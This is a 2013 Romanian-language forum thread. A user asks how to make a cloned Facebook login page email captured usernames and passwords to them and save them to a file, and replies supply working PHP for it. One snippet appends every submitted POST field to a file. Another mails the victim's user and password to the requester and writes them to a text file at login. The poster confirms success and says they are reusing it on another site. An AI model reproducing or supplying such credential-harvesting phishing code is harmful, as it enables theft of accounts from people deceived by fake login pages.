robertgreen Posted June 5, 2013 Report Share Posted June 5, 2013 Am o clona la loginul de la FB pe buyandsellltickets.com si tot ma chinui sa fac ceva in php ca atunci cand introduc userul si parola si dau pe log in userul si parola sa imi vina intr-un mail si sa se salveze si intru-un fisier pe hosting. ex. usere.htmlTot ma chinui cu <form method="post" action="check.php"> . Am citit si tot am citit dar nu am reusit nimic ... modific ce modific si cand ma duce in check.php imi da o eroare.Ma intereseaza in general ce trebuie urmarit a fi modificat indiferent de pagina. Ca este clona de FB ca este de Yahoo sau altceva. Ma intereseaza daca se poate sa imi ziceti ce trebuie sa urmaresc ca sa reusesc sa fac sa imi vina pe mail sau sa se salveze in usere.html userul si parola. Poate nu am fost chiar explicit. Imi cer scuze pentru aspectul asta.Va multumesc, Quote Link to comment Share on other sites More sharing options...
Vlachs Posted June 5, 2013 Report Share Posted June 5, 2013 e simplu$to_save="Action at: ".date("poti sa cauti pe php.net ce ai nevoie")."\n";foreach($_POST as $key_name=>$key_value){$to_save.=$key_name.":".$key_value."\n";}$to_save.="----end---";file_put_contents(te uiti pe php.net sa vezi ce argument este aici,$to_save,FILE_APPEND);si mai ai nevoie si de bucata asta PHP: mail - Manual Quote Link to comment Share on other sites More sharing options...
SticKyWoX Posted June 5, 2013 Report Share Posted June 5, 2013 Ce eroare iti da in check.php? Quote Link to comment Share on other sites More sharing options...
timy123 Posted June 5, 2013 Report Share Posted June 5, 2013 Omu vrea un PHP care sa iti tina userele si pe un notepad dar in acelas timp sa ii dea si mail cu ele, vezi daca te ajuta asta Mysend.phpON: Am pus cu majuscule unde trebuie sa modifici Quote Link to comment Share on other sites More sharing options...
Mecanik Posted June 5, 2013 Report Share Posted June 5, 2013 Prima data facem o functie:function trimite_mail(){$to = "MAILUL TAU AICI"; $subject = "Informatii User"; $body = "Hi,\n\nAi primit user/parola!: $user | $parola"; # pui cum ai variabilele tu in script $user/$parola@mail($to, $subject, $body)}Acum facem functia de salvare:function salveaza(){$myFile = "fisier.txt";$fh = fopen($myFile, 'w') or die("nu am permisie sa deschid fisierul");$stringData = "$user | $parola\n"; # pui cum ai variabilele tu in script $user/$parolafwrite($fh, $stringData);fclose($fh);}Acuma ca ai functiile, le chemi in momentul in care face login:trimite_mail();salveaza();Sper ca te ajuta, cheers! Quote Link to comment Share on other sites More sharing options...
robertgreen Posted June 5, 2013 Author Report Share Posted June 5, 2013 Am reusit eu sa fac ceva de genul, dar imi vine mailul gol. cred ca este de la variabilele alea. Quote Link to comment Share on other sites More sharing options...
bubbles Posted June 5, 2013 Report Share Posted June 5, 2013 Pune codul aici sa vedem care ti buba. Quote Link to comment Share on other sites More sharing options...
robertgreen Posted June 5, 2013 Author Report Share Posted June 5, 2013 Am reusit intr-un final. nu imi dateam seama din sursa care este variabila pentru user si parola ca erau in poloneza . incercam sa fac pentru un alt site. Multumesc mult pentru tot. Daca o sa am nevoie mai apelez.Bafta baieti ! Quote Link to comment Share on other sites More sharing options...